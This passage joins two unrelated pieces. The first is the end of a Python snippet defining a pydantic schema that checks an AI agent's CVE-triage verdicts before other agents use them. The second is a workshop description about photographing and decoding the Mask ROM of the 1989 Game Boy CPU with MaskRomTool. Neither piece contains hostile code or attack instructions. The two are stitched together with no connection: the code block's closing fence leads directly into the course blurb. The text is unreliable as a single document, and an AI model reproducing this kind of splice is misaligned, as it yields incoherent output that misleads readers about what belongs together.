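# a strict model before downstream agents may consume it. Field names are
# illustrative, not NOVA's actual schema.
from typing import Literal
from pydantic import BaseModel, Field, ValidationError

class TriageVerdict(BaseModel):
    cve_id: str = Field(pattern=r"^CVE-\d{4}-\d{4,}$")
    applies: bool
    affected_devices: list[str]
    confidence: float = Field(ge=0.0, le=1.0)
    rationale: str
    recommended_action: Literal["patch", "mitigate", "monitor", "not_applicable"]

def parse_agent_output(raw_json: str) -> TriageVerdict:
    try:
        return TriageVerdict.model_validate_json(raw_json)
    except ValidationError as err:
        # Reject and re-prompt the agent rather than letting a malformed verdict flow on.
        raise RuntimeError(f"agent output failed schema validation: {err}") from err
```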
In a microcontroller, the Mask ROM is a read-only memory which is programmed at manufacturing time. Bits cannot be changed later, but they can be seen under a microscope. These ROMs are often used for boot memories or cryptography lookup tables. In this two-hour workshop, you will begin with a die photograph of the CPU from the 1989 Game Boy console. Using the instructor's open-source MaskRomTool software, you will mark rows and columns of bits, then teach the software to recognize the difference between ones and zeroes. By the end, you will have produced a disassembly of the ROM, allowing you to read the code that displays the trademarked logo at startup. Students should bring a recent Windows or macOS laptop. A mouse and some knowledge of assembly language are recommended but not required.